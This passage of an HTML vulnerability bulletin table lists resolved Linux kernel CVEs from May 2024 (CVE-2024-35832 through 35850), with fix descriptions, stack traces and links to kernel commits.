exit_to_user_mode_prepare+0x197/0x1a0 [ 406.844302 ] syscall_exit_to_user_mode+0x16/0x40 [ 406.844510 ] do_syscall_64+0x4e/0xf0 [ 406.844675 ] entry_SYSCALL_64_after_hwframe+0x6e/0x76 [ 406.844907 ] RIP: 0033:0x7f0a2664e4fb</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35832" target="_blank">CVE-2024-35832</a><br><a href="https://git.kernel.org/stable/c/369acf97d6fd5da620d053d0f1878ffe32eff555" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/56590678791119b9a655202e49898edfb9307271" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: dmaengine: fsl-qdma: Fix a memory leak related to the queue command DMA This dma_alloc_coherent() is undone neither in the remove function, nor in the error handling path of fsl_qdma_probe(). Switch to the managed version to fix both issues.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35833" target="_blank">CVE-2024-35833</a><br><a href="https://git.kernel.org/stable/c/15eb996d7d13cb72a16389231945ada8f0fef2c3" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/198270de9d8eb3b5d5f030825ea303ef95285d24" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/1c75fe450b5200c78f4a102a0eb8e15d8f1ccda8" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/25ab4d72eb7cbfa0f3d97a139a9b2bfcaa72dd59" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/3aa58cb51318e329d203857f7a191678e60bb714" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/5cd8a51517ce15edbdcea4fc74c4c127ddaa1bd6" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/ae6769ba51417c1c86fb645812d5bff455eee802" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: xsk: recycle buffer in case Rx queue was full Add missing xsk_buff_free() call when __xsk_rcv_zc() failed to produce descriptor to XSK Rx queue.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35834" target="_blank">CVE-2024-35834</a><br><a href="https://git.kernel.org/stable/c/269009893146c495f41e9572dd9319e787c2eba9" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/7b4d93d31aade99210d41cd9d4cbd2957c98bc8c" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/cce713664548284daf977739e7ff1cd59e84189c" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: net/mlx5e: fix a double-free in arfs_create_groups When `in` allocated by kvzalloc fails, arfs_create_groups will free ft-&gt;g and return an error. However, arfs_create_table, the only caller of arfs_create_groups, will hold this error and call to mlx5e_destroy_flow_table, in which the ft-&gt;g will be freed again.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35835" target="_blank">CVE-2024-35835</a><br><a href="https://git.kernel.org/stable/c/2501afe6c4c9829d03abe9a368b83d9ea1b611b7" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/3c6d5189246f590e4e1f167991558bdb72a4738b" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/42876db001bbea7558e8676d1019f08f9390addb" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/66cc521a739ccd5da057a1cb3d6346c6d0e7619b" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/b21db3f1ab7967a81d6bbd328d28fe5a4c07a8a7" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/c57ca114eb00e03274dd38108d07a3750fa3c056" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/cf116d9c3c2aebd653c2dfab5b10c278e9ec3ee5" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/e3d3ed8c152971dbe64c92c9ecb98fdb52abb629" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: dpll: fix pin dump crash for rebound module When a kernel module is unbound but the pin resources were not entirely freed (other kernel module instance of the same PCI device have had kept the reference to that pin), and kernel module is again bound, the pin properties would not be updated (the properties are only assigned when memory for the pin is allocated), prop pointer still points to the kernel module memory of the kernel module which was deallocated on the unbind. If the pin dump is invoked in this state, the result is a kernel crash. Prevent the crash by storing persistent pin properties in dpll subsystem, copy the content from the kernel module when pin is allocated, instead of using memory of the kernel module.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35836" target="_blank">CVE-2024-35836</a><br><a href="https://git.kernel.org/stable/c/5050a5b9d8b4d3c6f7e376e07670e437db7ccf9c" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/830ead5fb0c5855ce4d70ba2ed4a673b5f1e7d9b" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: net: mvpp2: clear BM pool before initialization Register value persist after booting the kernel using kexec which results in kernel panic. Thus clear the BM pool registers before initialisation to fix the issue.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35837" target="_blank">CVE-2024-35837</a><br><a href="https://git.kernel.org/stable/c/83f99138bf3b396f761600ab488054396fb5768f" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/938729484cfa535e9987ed0f86f29a2ae3a8188b" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/9f538b415db862e74b8c5d3abbccfc1b2b6caa38" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/af47faa6d3328406038b731794e7cf508c71affa" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/cec65f09c47d8c2d67f2bcad6cf05c490628d1ec" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/dc77f6ab5c3759df60ff87ed24f4d45df0f3b4c4" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: wifi: mac80211: fix potential sta-link leak When a station is allocated, links are added but not set to valid yet (e.g. during connection to an AP MLD), we might remove the station without ever marking links valid, and leak them. Fix that.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35838" target="_blank">CVE-2024-35838</a><br><a href="https://git.kernel.org/stable/c/49aaeb8c539b1633b3bd7c2df131ec578aa1eae1" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/587c5892976108674bbe61a8ff659de279318034" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/b01a74b3ca6fd51b62c67733ba7c3280fa6c5d26" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/e04bf59bdba0fa45d52160be676114e16be855a9" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: netfilter: bridge: replace physindev with physinif in nf_bridge_info An skb can be added to a neigh-&gt;arp_queue while waiting for an arp reply. Where original skb's skb-&gt;dev can be different to neigh's neigh-&gt;dev. For instance in case of bridging dnated skb from one veth to another, the skb would be added to a neigh-&gt;arp_queue of the bridge. As skb-&gt;dev can be reset back to nf_bridge-&gt;physindev and used, and as there is no explicit mechanism that prevents this physindev from been freed under us (for instance neigh_flush_dev doesn't cleanup skbs from different device's neigh queue) we can crash on e.g. this stack: arp_process neigh_update skb = __skb_dequeue(&amp;neigh-&gt;arp_queue) neigh_resolve_output(..., skb) ... br_nf_dev_xmit br_nf_pre_routing_finish_bridge_slow skb-&gt;dev = nf_bridge-&gt;physindev br_handle_frame_finish Let's use plain ifindex instead of net_device link. To peek into the original net_device we will use dev_get_by_index_rcu(). Thus either we get device and are safe to use it or we don't get it and drop skb.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35839" target="_blank">CVE-2024-35839</a><br><a href="https://git.kernel.org/stable/c/544add1f1cfb78c3dfa3e6edcf4668f6be5e730c" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/7ae19ee81ca56b13c50a78de6c47d5b8fdc9d97b" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/9325e3188a9cf3f69fc6f32af59844bbc5b90547" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/9874808878d9eed407e3977fd11fee49de1e1d86" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: mptcp: use OPTION_MPTCP_MPJ_SYNACK in subflow_finish_connect() subflow_finish_connect() uses four fields (backup, join_id, thmac, none) that may contain garbage unless OPTION_MPTCP_MPJ_SYNACK has been set in mptcp_parse_option()</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35840" target="_blank">CVE-2024-35840</a><br><a href="https://git.kernel.org/stable/c/413b913507326972135d2977975dbff8b7f2c453" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/51e4cb032d49ce094605f27e45eabebc0408893c" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/76e8de7273a22a00d27e9b8b7d4d043d6433416a" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/ad3e8f5c3d5c53841046ef7a947c04ad45a20721" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/be1d9d9d38da922bd4beeec5b6dd821ff5a1dfeb" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: net: tls, fix WARNIING in __sk_msg_free A splice with MSG_SPLICE_PAGES will cause tls code to use the tls_sw_sendmsg_splice path in the TLS sendmsg code to move the user provided pages from the msg into the msg_pl. This will loop over the msg until msg_pl is full, checked by sk_msg_full(msg_pl). The user can also set the MORE flag to hint stack to delay sending until receiving more pages and ideally a full buffer. If the user adds more pages to the msg than can fit in the msg_pl scatterlist (MAX_MSG_FRAGS) we should ignore the MORE flag and send the buffer anyways. What actually happens though is we abort the msg to msg_pl scatterlist setup and then because we forget to set 'full record' indicating we can no longer consume data without a send we fallthrough to the 'continue' path which will check if msg_data_left(msg) has more bytes to send and then attempts to fit them in the already full msg_pl. Then next iteration of sender doing send will encounter a full msg_pl and throw the warning in the syzbot report. To fix simply check if we have a full_record in splice code path and if not send the msg regardless of MORE flag.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35841" target="_blank">CVE-2024-35841</a><br><a href="https://git.kernel.org/stable/c/02e368eb1444a4af649b73cbe2edd51780511d86" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/294e7ea85f34748f04e5f3f9dba6f6b911d31aa8" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/dc9dfc8dc629e42f2234e3327b75324ffc752bc9" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: ASoC: mediatek: sof-common: Add NULL check for normal_link string It's not granted that all entries of struct sof_conn_stream declare a `normal_link` (a non-SOF, direct link) string, and this is the case for SoCs that support only SOF paths (hence do not support both direct and SOF usecases). For example, in the case of MT8188 there is no normal_link string in any of the sof_conn_stream entries and there will be more drivers doing that in the future. To avoid possible NULL pointer KPs, add a NULL check for `normal_link`.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35842" target="_blank">CVE-2024-35842</a><br><a href="https://git.kernel.org/stable/c/b1d3db6740d0997ffc6e5a0d96ef7cbd62b35fdd" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/cad471227a37c0c7c080bfc9ed01b53750e82afe" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/cde6ca5872bf67744dffa875a7cb521ab007b7ef" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/e3b3ec967a7d93b9010a5af9a2394c8b5c8f31ed" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: iommu/vt-d: Use device rbtree in iopf reporting path The existing I/O page fault handler currently locates the PCI device by calling pci_get_domain_bus_and_slot(). This function searches the list of all PCI devices until the desired device is found. To improve lookup efficiency, replace it with device_rbtree_find() to search the device within the probed device rbtree. The I/O page fault is initiated by the device, which does not have any synchronization mechanism with the software to ensure that the device stays in the probed device tree. Theoretically, a device could be released by the IOMMU subsystem after device_rbtree_find() and before iopf_get_dev_fault_param(), which would cause a use-after-free problem. Add a mutex to synchronize the I/O page fault reporting path and the IOMMU release device path. This lock doesn't introduce any performance overhead, as the conflict between I/O page fault reporting and device releasing is very rare.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35843" target="_blank">CVE-2024-35843</a><br><a href="https://git.kernel.org/stable/c/3d39238991e745c5df85785604f037f35d9d1b15" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/def054b01a867822254e1dda13d587f5c7a99e2a" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: f2fs: compress: fix reserve_cblocks counting error when out of space When a file only needs one direct_node, performing the following operations will cause the file to be unrepairable: unisoc # ./f2fs_io compress test.apk unisoc #df -h | grep dm-48 /dev/block/dm-48 112G 112G 1.2M 100% /data unisoc # ./f2fs_io release_cblocks test.apk 924 unisoc # df -h | grep dm-48 /dev/block/dm-48 112G 112G 4.8M 100% /data unisoc # dd if=/dev/random of=file4 bs=1M count=3 3145728 bytes (3.0 M) copied, 0.025 s, 120 M/s unisoc # df -h | grep dm-48 /dev/block/dm-48 112G 112G 1.8M 100% /data unisoc # ./f2fs_io reserve_cblocks test.apk F2FS_IOC_RESERVE_COMPRESS_BLOCKS failed: No space left on device adb reboot unisoc # df -h | grep dm-48 /dev/block/dm-48 112G 112G 11M 100% /data unisoc # ./f2fs_io reserve_cblocks test.apk 0 This is because the file has only one direct_node. After returning to -ENOSPC, reserved_blocks += ret will not be executed. As a result, the reserved_blocks at this time is still 0, which is not the real number of reserved blocks. Therefore, fsck cannot be set to repair the file. After this patch, the fsck flag will be set to fix this problem. unisoc # df -h | grep dm-48 /dev/block/dm-48 112G 112G 1.8M 100% /data unisoc # ./f2fs_io reserve_cblocks test.apk F2FS_IOC_RESERVE_COMPRESS_BLOCKS failed: No space left on device adb reboot then fsck will be executed unisoc # df -h | grep dm-48 /dev/block/dm-48 112G 112G 11M 100% /data unisoc # ./f2fs_io reserve_cblocks test.apk 924</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35844" target="_blank">CVE-2024-35844</a><br><a href="https://git.kernel.org/stable/c/2f6d721e14b69d6e1251f69fa238b48e8374e25f" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/569c198c9e2093fd29cc071856a4e548fda506bc" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/889846dfc8ee2cf31148a44bfd2faeb2faadc685" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/f0bf89e84c3afb79d7a3a9e4bc853ad6a3245c0a" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/fa3ac8b1a227d9b470b87972494293348b5839ee" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/fc0aed88afbf6f606205129a7466eebdf528e3f3" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: wifi: iwlwifi: dbg-tlv: ensure NUL termination The iwl_fw_ini_debug_info_tlv is used as a string, so we must ensure the string is terminated correctly before using it.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35845" target="_blank">CVE-2024-35845</a><br><a href="https://git.kernel.org/stable/c/71d4186d470e9cda7cd1a0921b4afda737c6f641" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/783d413f332a3ebec916664b366c28f58147f82c" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/96aa40761673da045a7774f874487cdb50c6a2f7" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/c855a1a5b7e3de57e6b1b29563113d5e3bfdb89a" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/ea1d166fae14e05d49ffb0ea9fcd4658f8d3dcea" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/fabe2db7de32a881e437ee69db32e0de785a6209" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/fec14d1cdd92f340b9ba2bd220abf96f9609f2a9" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: mm: zswap: fix shrinker NULL crash with cgroup_disable=memory Christian reports a NULL deref in zswap that he bisected down to the zswap shrinker. The issue also cropped up in the bug trackers of libguestfs [1] and the Red Hat bugzilla [2]. The problem is that when memcg is disabled with the boot time flag, the zswap shrinker might get called with sc-&gt;memcg == NULL. This is okay in many places, like the lruvec operations. But it crashes in memcg_page_state() - which is only used due to the non-node accounting of cgroup's the zswap memory to begin with. Nhat spotted that the memcg can be NULL in the memcg-disabled case, and I was then able to reproduce the crash locally as well. [1] https://github.com/libguestfs/libguestfs/issues/139 [2] https://bugzilla.redhat.com/show_bug.cgi?id=2275252</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35846" target="_blank">CVE-2024-35846</a><br><a href="https://git.kernel.org/stable/c/682886ec69d22363819a83ddddd5d66cb5c791e1" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/b0fdabc908a7f81d12382c87ca9e46a9c2e14042" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: irqchip/gic-v3-its: Prevent double free on error The error handling path in its_vpe_irq_domain_alloc() causes a double free when its_vpe_init() fails after successfully allocating at least one interrupt. This happens because its_vpe_irq_domain_free() frees the interrupts along with the area bitmap and the vprop_page and its_vpe_irq_domain_alloc() subsequently frees the area bitmap and the vprop_page again. Fix this by unconditionally invoking its_vpe_irq_domain_free() which handles all cases correctly and by removing the bitmap/vprop_page freeing from its_vpe_irq_domain_alloc(). [ tglx: Massaged change log ]</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35847" target="_blank">CVE-2024-35847</a><br><a href="https://git.kernel.org/stable/c/03170e657f62c26834172742492a8cb8077ef792" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/5b012f77abde89bf0be8a0547636184fea618137" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/5dbdbe1133911ca7d8466bb86885adec32ad9438" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/aa44d21574751a7d6bca892eb8e0e9ac68372e52" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/b72d2b1448b682844f995e660b77f2a1fabc1662" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/c26591afd33adce296c022e3480dea4282b7ef91" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/dd681710ab77c8beafe2e263064cb1bd0e2d6ca9" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/f5417ff561b8ac9a7e53c747b8627a7ab58378ae" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: eeprom: at24: fix memory corruption race condition If the eeprom is not accessible, an nvmem device will be registered, the read will fail, and the device will be torn down. If another driver accesses the nvmem device after the teardown, it will reference invalid memory. Move the failure point before registering the nvmem device.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35848" target="_blank">CVE-2024-35848</a><br><a href="https://git.kernel.org/stable/c/26d32bec4c6d255a03762f33c637bfa3718be15a" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/2af84c46b9b8f2d6c0f88d09ee5c849ae1734676" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/6d8b56ec0c8f30d5657382f47344a32569f7a9bc" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/c43e5028f5a35331eb25017f5ff6cc21735005c6" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/c850f71fca09ea41800ed55905980063d17e01da" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/f42c97027fb75776e2e9358d16bf4a99aeb04cf2" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: btrfs: fix information leak in btrfs_ioctl_logical_to_ino() Syzbot reported the following information leak for in btrfs_ioctl_logical_to_ino(): BUG: KMSAN: kernel-infoleak in instrument_copy_to_user include/linux/instrumented.h:114 [inline] BUG: KMSAN: kernel-infoleak in _copy_to_user+0xbc/0x110 lib/usercopy.c:40 instrument_copy_to_user include/linux/instrumented.h:114 [inline] _copy_to_user+0xbc/0x110 lib/usercopy.c:40 copy_to_user include/linux/uaccess.h:191 [inline] btrfs_ioctl_logical_to_ino+0x440/0x750 fs/btrfs/ioctl.c:3499 btrfs_ioctl+0x714/0x1260 vfs_ioctl fs/ioctl.c:51 [inline] __do_sys_ioctl fs/ioctl.c:904 [inline] __se_sys_ioctl+0x261/0x450 fs/ioctl.c:890 __x64_sys_ioctl+0x96/0xe0 fs/ioctl.c:890 x64_sys_call+0x1883/0x3b50 arch/x86/include/generated/asm/syscalls_64.h:17 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xcf/0x1e0 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x77/0x7f Uninit was created at: __kmalloc_large_node+0x231/0x370 mm/slub.c:3921 __do_kmalloc_node mm/slub.c:3954 [inline] __kmalloc_node+0xb07/0x1060 mm/slub.c:3973 kmalloc_node include/linux/slab.h:648 [inline] kvmalloc_node+0xc0/0x2d0 mm/util.c:634 kvmalloc include/linux/slab.h:766 [inline] init_data_container+0x49/0x1e0 fs/btrfs/backref.c:2779 btrfs_ioctl_logical_to_ino+0x17c/0x750 fs/btrfs/ioctl.c:3480 btrfs_ioctl+0x714/0x1260 vfs_ioctl fs/ioctl.c:51 [inline] __do_sys_ioctl fs/ioctl.c:904 [inline] __se_sys_ioctl+0x261/0x450 fs/ioctl.c:890 __x64_sys_ioctl+0x96/0xe0 fs/ioctl.c:890 x64_sys_call+0x1883/0x3b50 arch/x86/include/generated/asm/syscalls_64.h:17 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xcf/0x1e0 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x77/0x7f Bytes 40-65535 of 65536 are uninitialized Memory access of size 65536 starts at ffff888045a40000 This happens, because we're copying a 'struct btrfs_data_container' back to user-space. This btrfs_data_container is allocated in 'init_data_container()' via kvmalloc(), which does not zero-fill the memory. Fix this by using kvzalloc() which zeroes out the memory on allocation.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35849" target="_blank">CVE-2024-35849</a><br><a href="https://git.kernel.org/stable/c/2f7ef5bb4a2f3e481ef05fab946edb97c84f67cf" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/30189e54ba80e3209d34cfeea87b848f6ae025e6" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/3a63cee1a5e14a3e52c19142c61dd5fcb524f6dc" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/689efe22e9b5b7d9d523119a9a5c3c17107a0772" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/73db209dcd4ae026021234d40cfcb2fb5b564b86" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/8bdbcfaf3eac42f98e5486b3d7e130fa287811f6" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/e58047553a4e859dafc8d1d901e1de77c9dd922d" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/fddc19631c51d9c17d43e9f822a7bc403af88d54" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: Bluetooth: qca: fix NULL-deref on non-serdev setup Qualcomm ROME controllers can be registered from the Bluetooth line discipline and in this case the HCI UART serdev pointer is NULL. Add the missing sanity check to prevent a NULL-pointer dereference when setup() is called for a non-serdev controller.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
